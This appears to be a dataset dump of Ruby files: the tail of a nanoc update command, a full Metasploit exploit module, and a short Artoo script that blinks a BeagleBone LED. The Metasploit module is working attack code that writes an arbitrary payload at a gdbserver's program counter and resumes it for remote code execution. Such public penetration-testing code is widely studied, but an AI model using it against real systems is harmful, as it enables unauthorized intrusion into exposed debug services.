                     'Please do not interrupt this operation; doing so can ' +
                     'result in data loss. As always, consider making a ' +
                     'backup copy.'
        $stderr.puts
        $stderr.puts 'If this nanoc site is versioned using a VCS ' +
                     'supported by nanoc, consider using the --vcs option ' +
                     'to have nanoc perform add/delete/move operations ' +
                     'using the specified VCS. To get a list of VCSes ' +
                     'supported by nanoc, issue the "info" command.'
        $stderr.puts
        $stderr.puts 'To continue, use the -y/--yes option, like "nanoc3 ' +
                     'update -y".'
        exit 1
      end

      # Update
      @base.site.data_sources.each do |data_source|
        data_source.update
      end
    end

  end
end
| 29.385417 | 78 | 0.542361 |
1ddcf35017881bf8b8a1436ed0537c8097c17e6e | 2,170 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit: executes an arbitrary payload against an exposed
# gdbserver service by writing the payload at the program counter and
# resuming execution. Handles both gdbserver attached to a process and
# gdbserver running in --multi mode with no process loaded.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  # Provides the GDB remote-serial-protocol helpers used below
  # (handshake, enable_extended_mode, process_info, write, continue, ...).
  include Msf::Exploit::Remote::Gdb

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'GDB Server Remote Payload Execution',
      'Description' => %q{
        This module attempts to execute an arbitrary payload on a loose gdbserver service.
      },
      'Author' => [ 'joev' ],
      'Targets' => [
        [ 'x86 (32-bit)', { 'Arch' => ARCH_X86 } ],
        [ 'x86_64 (64-bit)', { 'Arch' => ARCH_X64 } ]
      ],
      'References' =>
        [
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/3691']
        ],
      'DisclosureDate' => 'Aug 24 2014',
      'Platform' => %w(linux unix osx),
      'DefaultTarget' => 0,
      'DefaultOptions' => {
        'PrependFork' => true
      }
    ))

    register_options([
      OptString.new('EXE_FILE', [
        false,
        "The exe to spawn when gdbserver is not attached to a process.",
        '/bin/true'
      ])
    ])
  end

  # Exploit flow: handshake with gdbserver, locate the program counter
  # (loading EXE_FILE first if no process is attached), verify the payload
  # architecture matches the target, write the payload at PC, and resume.
  def exploit
    connect
    print_status "Performing handshake with gdbserver..."
    handshake
    enable_extended_mode

    begin
      print_status "Stepping program to find PC..."
      gdb_data = process_info
    rescue BadAckError, BadResponseError
      # gdbserver is running with the --multi flag and is not currently
      # attached to any process. let's attach to /bin/true or something.
      print_status "No process loaded, attempting to load /bin/true..."
      run(datastore['EXE_FILE'])
      gdb_data = process_info
    end

    gdb_pc, gdb_arch = gdb_data.values_at(:pc, :arch)

    # Abort early rather than writing a payload built for the wrong arch.
    unless payload.arch.include? gdb_arch
      fail_with(Failure::BadConfig, "The payload architecture is incorrect: the payload is #{payload.arch.first}, but #{gdb_arch} was detected from gdb.")
    end

    print_status "Writing payload at #{gdb_pc}..."
    write(payload.encoded, gdb_pc)

    print_status "Executing the payload..."
    continue

    handler
    disconnect
  end
end
| 27.820513 | 154 | 0.612903 |
ac30c6d5366e568dabfb6313851ab78603f29601 | 179 | require 'artoo'
# Artoo robot definition: blink the LED wired to BeagleBone pin P9_12.
connection :beaglebone, :adaptor => :beaglebone
device :led, :driver => :led, :pin => :P9_12

work do
  # Toggle the LED once per second: off when lit, on when dark.
  every 1.second do
    led.on? ? led.off : led.on
  end
end
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.